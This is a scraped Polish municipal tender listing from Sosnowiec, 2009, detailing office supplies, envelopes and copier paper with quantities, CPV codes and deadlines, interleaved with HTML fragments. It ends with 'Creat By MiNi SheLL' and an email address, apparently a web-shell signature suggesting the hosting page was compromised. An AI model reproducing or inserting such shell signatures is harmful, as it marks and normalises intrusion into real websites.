Załącznik nr 2B- szczegółowy formularz oferty - dla  zadania B  	                             Prezydent Miasta Sosnowca
do postępowania przetargowego nr WAG.3410-01-67-09                                                                       al. Zwycięstwa 20
Urząd Miejski w Sosnowcu                                                                                              41-200 Sosnowiec

      Lp.	

Nazwa artykułu	
Jednostka
 miary	
Zamawiana
liczba	
Dostawa
25.09.09	Kwota
jednostkowa
brutto
jednostki 
 miary	Wartość 
całej 
poz.
brutto
(zamawianej liczby)
						
	1	2	3	4	5	6
52.	Teczka plastikowa zatrzaskowa biała   A4	sztuka	50	50		
53.	Ofertówka A4	sztuka	100	100		
54.	Teczka do podpisu A4, skóropodobna , z 10 przegródkami	sztuka	4	4		
55.	Koszulka na dokumenty A4
(opakowanie-100 sztuk)	opakowanie	10	10		
56.	Segregator szer. grzbietu 7,5 cm z wymienną etykietką	sztuka	15	15		
57.	Segregator szer. grzbietu 5 cm z wymienną etykietką	sztuka	15	15		
58.	Bloczek kostka 8,3 cm x 8,3 cm w pojemniku	sztuka	6	6		
59.	Bloczek kostka 8,3 cm x 8,3 cm bez pojemnika	sztuka	10	10		
60.	Brulion na spirali A4 -min 96 kartek	sztuka	12	12		
61.	Blok biurowy A4 (w kratkę)-50 kartek	sztuka	12	12		
62.	Zeszyt A5 (miękka okładka, w kratkę) - 60 kartek	sztuka	12	12		
63.	Zeszyt A5 (twarda okładka, w kratkę) -96 kartek	sztuka	12	12		
64.	Spinacze metalowe pokryte kolorowym plastikiem 50 sztuk w opakowaniu 50 mm- wys.	opakowanie	30	30		
65.	 Komplet zakreślaczy  typu DONAU lub równoważny (opakowanie 4 sztuki)	opakowanie	8	8.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.19.20.00-1, 30.19.76.44-2, 30.19.92.30-1.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 25.11.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Dostawa artykułów na potrzeby Jednostki Realizującej Projekt- zadanie C.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Załącznik nr 2C- szczegółowy formularz oferty - dla  zadania C  	                             Prezydent Miasta Sosnowca
do postępowania przetargowego nr WAG.3410-01-67-09                                                                       al. Zwycięstwa 20
Urząd Miejski w Sosnowcu                                                                                              41-200 Sosnowiec
      Lp.	

Nazwa artykułu	
Jednostka
 miary	
Zamawiana
liczba	
Dostawa
w ciągu 7 dni od podpisania umowy	Kwota
jednostkowa
brutto
jednostki 
 miary	Wartość 
całej 
poz.
brutto
(zamawianej liczby)
						
	1	2	3	4	5	6
1.	Rysiki do ołówków automatycznych B, 0,5-opakowanie 12 sztuk	opakowanie	4	4		
2.	Szufladki  plastikowe na dokumenty A4	sztuki	9	9		
3.	Bloczki żółte samoprzylepne 50 mm x 75mm	bloczek	75	75		
4.	Bloczki żółte samoprzylepne 75mm x 75mm	bloczek	75	75		
5.	Brulion w twardej oprawie A5 96 kartek	sztuki	20	20		
6.	Cienkopisy wodoodporne do płyt CD/DVD	sztuki	3	3		
7.	Długopis Zenith  7 z niebieskim wkładem, lub równoważny	sztuki	10	10		
8.	Długopis Zenith  7 z czarnym wkładem lub równoważny	sztuki	10	10		
9.	Dziennik korespondencyjny A4- 94 kartki twarda oprawa	sztuki	3	3		
10.	Gumki do mazania FACTIS- średnie lub równoważne 	sztuki	5	5		
11.	Klej w tubce Donau 36 g lub równoważny	sztuki	5	5		
12.	Korektor w taśmie 4,2 mmx 9m	sztuki	5	5		
13.	Korektor w piórze 8 ml szybkoschnący z metalową końcówką uchwyt połączony z dozownikiem	sztuki	5	5		
14.	Korektor w płynie z gąbką -poj. 20 ml	sztuki	5	5		
15.	Koperty białe 16cm x 11cm niemakulaturowe	sztuki	150	150		
16.	Koperty białe 25cm x 17,5 cm niemakulaturowe	sztuki	150	150		
17.	Koperty białe 32,5cm x 23 cm niemakulaturowe	sztuki	150	150		
18.	Koperty białe 46 cm x 30 cm samoklejące 
z rozszerzanym bokiem niemakulaturowe	sztuki	150	150		
19.	Koperty z zabezpieczeniem powietrznym 11,5cm x 21,5cm niemakulaturowe	sztuki	30	30		
20.	Koperty z zabezpieczeniem powietrznym 26,5cm x 36cm	sztuki	30	30		
21.	Koszulki z grubszej folii  A4, (100 sztuk 
w opakowaniu)	opakowanie	20	20		
22.	Koszulki na 1 CD-DVD, ( 10 sztuk 
w opakowaniu)	opakowanie	15	15		
23.	Koszulki na wizytówki, ( 10 sztuk 
w opakowaniu)	opakowanie	5	5		
24.	Koszulki na zdjęcia o wymiarze 10cm x 15, 1cm (10 sztuk w opakowaniu)	opakowanie	5	5		
25.	Komplet linijek  plastikowych (ekierka, linijka, kątomierz)	komplet	3	3		
26.	Nożyczki całe metalowe-17 cm	sztuki	9	9		
27.	Nóż do kopert z drewnianym uchwytem	sztuki	2	2		
28.	Ofertówki, A4 (25 sztuk w opakowaniu)	opakowanie	8	8		

Załącznik nr 2C- szczegółowy formularz oferty - dla  zadania C  	                             Prezydent Miasta Sosnowca
do postępowania przetargowego nr WAG.3410-01-67-09                                                                       al. Zwycięstwa 20
Urząd Miejski w Sosnowcu                                                                                              41-200 Sosnowiec
      Lp.	

Nazwa artykułu	
Jednostka
 miary	
Zamawiana
liczba	1
Dostawa 
w ciągu 7 dni od podpisania umowy
	Kwota
jednostkowa
brutto
jednostki  
miary	Wartość 
całej poz.
brutto
(zamawianej liczby)
						
	1	2	3	4	5	6
29.	Ołówki automatyczne typu Pentel 0,5 lub równoważne	sztuka	10	10		
30.	Papier samoprzylepny - czerwony A4	sztuka	20	20		
31.	Papier samoprzylepny - niebieski A4	sztuka	20	20		
32.	Papier samoprzylepny - zielony A4	sztuka	20	20		
33.	Pojemnik na kartki plastikowy 9cm x 9 cm	sztuka	9	9		
34.	Pojemnik na spinacze plastikowy z magnesem	sztuka	9	9		
35.	Przekładki do segregatorów kartonowe, A4 w 1 opakowaniu mieści się 100 sztuk	opakowanie	10	10		
36.	Przekładki PP kolorowe z wymiennymi indeksami A4-10 	sztuka	30	30		
37.	Przekładki PP kolorowe z wymiennymi indeksami A4-5	sztuka	20	20		
38.	Przybornik plastikowy na biurko	sztuka	9	9		
39.	Rysiki do ołówków automatycznych HB-0,5  opakowanie -12 sztuk	opakowanie	5	5		
40.	Segregatory A4 szerokie 75 mm z czteropierścieniowym mechanizmem	sztuka	30	30		
41.	Segregatory A4 wąskie z dwupierścieniowym mechanizmem	sztuka	40	40		
42.	Segregatory A4 szerokie 75mm z dwupierścieniowym mechanizmem	sztuka	60	60		
43.	Skoroszyt A4 miękki plastikowy do wpięcia do segregatora	sztuka	120	120		
44.	Spinacze małe powlekane 28mm, opakowanie 100 sztuk	opakowanie	18	18		
45.	Spinacze metalowe pokryte kolorowym plastikiem 100 sztuk w opakowaniu -28 mm wys.	opakowanie	60	60		
46.	Spinacze metalowe pokryte kolorowym plastikiem 50 sztuk w opakowaniu 50 mm wys.	opakowanie	60	60		
47.	Taśma klejąca dwustronna 50 mm x 10m	sztuka	2	2		
48.	Taśma klejąca cienka 19 mm x12m	sztuka	4	4		
49.	Taśma klejąca szeroka, bezbarwna 50 mm x10m	sztuka	2	2		
50.	Taśma klejąca szeroka, brązowa 50 mm x 10 m	sztuka	2	2		
51.	Teczki do podpisu harmonijkowe 10 przegródek, oprawa skóropodobna -A4	sztuka	5	5		
52.	Teczka-pudełko wys. min 1,5 cm zamykane gumką -A4	sztuka	20	20		
53.	Teczki wiązane białe tekturowe A4, 1 opakowanie zawiera 50 sztuk	opakowanie	3	3		
54.	Teczki wiązane białe A4, oczkowe do wpięcia do segregatorów	sztuka	150	150		


Załącznik nr 2C- szczegółowy formularz oferty - dla  zadania C  	                             Prezydent Miasta Sosnowca
do postępowania przetargowego nr WAG.3410-01-67-09                                                                       al. Zwycięstwa 20
Urząd Miejski w Sosnowcu                                                                                              41-200 Sosnowiec
      Lp.	

Nazwa artykułu	
Jednostka
 miary	
Zamawiana
liczba	1
Dostawa 
w ciągu 7 dni od podpisania umowy
	Kwota
jednostkowa
brutto
jednostki  miary	Wartość 
całej poz.
brutto
(zamawianej liczby)
						
	1	2	3	4	5	6
55.	Teczki lakierowane A4 z gumką	sztuka	50	50		
56.	Teczki plastikowe A4 do wpięcia do segregatorów	sztuka	150	150		
57.	Tusz do pieczątek - czarny -22 ml zwykły	sztuka	2	2		
58.	Tusz do pieczątek - czerwony-22 ml zwykły	sztuka	2	2		
59.	Tusz do pieczątek - niebieski -22 ml zwykły	sztuka	2	2		
60.	Wąsy skoroszytowe, (opakowanie - 150 szt.)	opakowanie	3	3		
61.	Wkłady czarne do długopisów Zenith 7 lub równoważne	sztuka	30	30		
62.	Wkłady niebieskie do długopisów Zenith 7 lub równoważne	sztuka	30	30		
63.	Zakładki indeksujące 45 x 12mm. 1 (opakowanie  50 szt.)	opakowanie	18	18		
64.	Zakreślacz kolorowy Donau - pomarańczowy, lub równoważny	sztuka	7	7		
65.	Zakreślacz kolorowy Donau - zielony , lub równoważny	sztuka	7	7		
66.	Zakreślacz kolorowy Donau - różowy , lub równoważny	sztuka	7	7		
67.	Zakreślacz kolorowy Donau - żółty,  lub równoważny	sztuka	7	7		
68.	Wymazywacz  do atramentu typu Schneider lub równoważny	sztuka	5	5		
69.	Zestaw cienkopisów  ( w opakowaniu 6 kolorów)	opakowanie	5	5		
70.	Zestaw ołówków technicznych  stopień twardości od 8 B do 2H
(w opakowaniu - 12 sztuk)	opakowanie	3	3		
71.	Zestaw markerów wodoodpornych 
(4 kolory w komplecie)	komplet	3	3		
72.	Zszywacz Eagle 837 na  12 kartek, lub równoważny	sztuka	9	9		
73.	Zszywki 24-6, (w opakowaniu  1000 szt.)	opakowanie	40	40		
74.	Zszywki 24-8, (w opakowaniu  1000 szt.)	opakowanie	30	30		
75.	Tablica korkowa w drewnianej ramce wraz z  kompletem pinezek
45 cm szer. x 60 cm wys.	zestaw	5	5.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.19.20.00-1, 30.19.76.44-2, 30.19.92.30-1.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 25.11.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Dostawa kopert wysyłkowych na potrzeby komórek organizacyjnych Urzędu Miejskiego w Sosnowcu - zadanie D..</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Załącznik nr 2D- szczegółowy formularz oferty - dla  zadania D  	                             Prezydent Miasta Sosnowca
do postępowania przetargowego nr WAG.3410-01-67-09                                                                       al. Zwycięstwa 20
Urząd Miejski w Sosnowcu                                                                                              41-200 Sosnowiec

Lp.	Nazwa artykułu	Jednostka miary	Zamawiana liczba	
1
Dostawa
7 dni po podpisaniu umowy	2
Dostawa
30.07.09	3
Dostawa
19.10.09	Kwota 
jednostkowa
brutto
jednostki 
miary	Wartość 
całej 
poz. 
brutto (zamawianej liczby)
								
	1	2	3	4	5	6	7	8
1.	Koperty białe 
z nadrukiem, samoklejące C-6	opakowanie
(1000 szt.)	60	20	20	20		
2.	Koperty średnie,
szare, z klejem B-5	opakowanie
(500szt)	20	10	10	------		
3.	Koperty średnie, białe z klejem B-5	opakowanie
(500szt)	20	10	10			
4.	Koperty białe z klejem C-4	opakowanie
(500szt)	15	10	5	-------		
5.	Koperty białe bez nadruku, samoprzylepne C-6	opakowanie
(1000 szt.)	60	20	20	20		
6.	Koperty rozszerzane
390mm x 255mm, białe	sztuki	600
	200	200	200		
7.	Koperty powietrzne B-16
(A-4)	sztuki	100
	50	50	--------		
8.	Koperty powietrzne B-12 	sztuki	50
	25	25	--------		
9.	Koperty szare z klejem
 C-4 	opakowanie
(500szt.)	6	6	---------	---------		
10.	Koperty białe DL bez okienka	opakowanie
(1000 szt.)	6	6	--------	---------		

UWAGA: Nie dopuszcza się kopert wykonanych z papieru makulaturowego.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.19.20.00-1, 30.19.76.44-2, 30.19.92.30-1.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 25.11.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Dostawa  papieru kserograficznego na potrzeby komórek organizacyjnych Urzędu Miejskiego w Sosnowcu..</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Załącznik nr 2E- szczegółowy formularz oferty - dla  zadania E		                 Prezydent Miasta Sosnowca
do postępowania przetargowego nr WAG.3410-01-67-09                                                                       al. Zwycięstwa 20
Urząd Miejski w Sosnowcu                                                                                              41-200 Sosnowiec

Lp.	Nazwa artykułu	Jednostka
 miary	Zamawiana
 liczba	1
Dostawa
25.11.09	Kwota
 jednostkowa
brutto
Jednostki
miary	Wartość
 całej 
poz.
 brutto
(zamawianej 
liczby)
						
	1	2	3	4	5	6
1.	Papier ksero
A-4; 80g-m2- stopień białości CIE 161	ryza
500 sztuk	910			
2.	Papier ksero 
A-3, 80g-m2-stopień białości CIE 161	ryza
500 sztuk	50.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.19.20.00-1, 30.19.76.44-2, 30.19.92.30-1.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 25.11.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com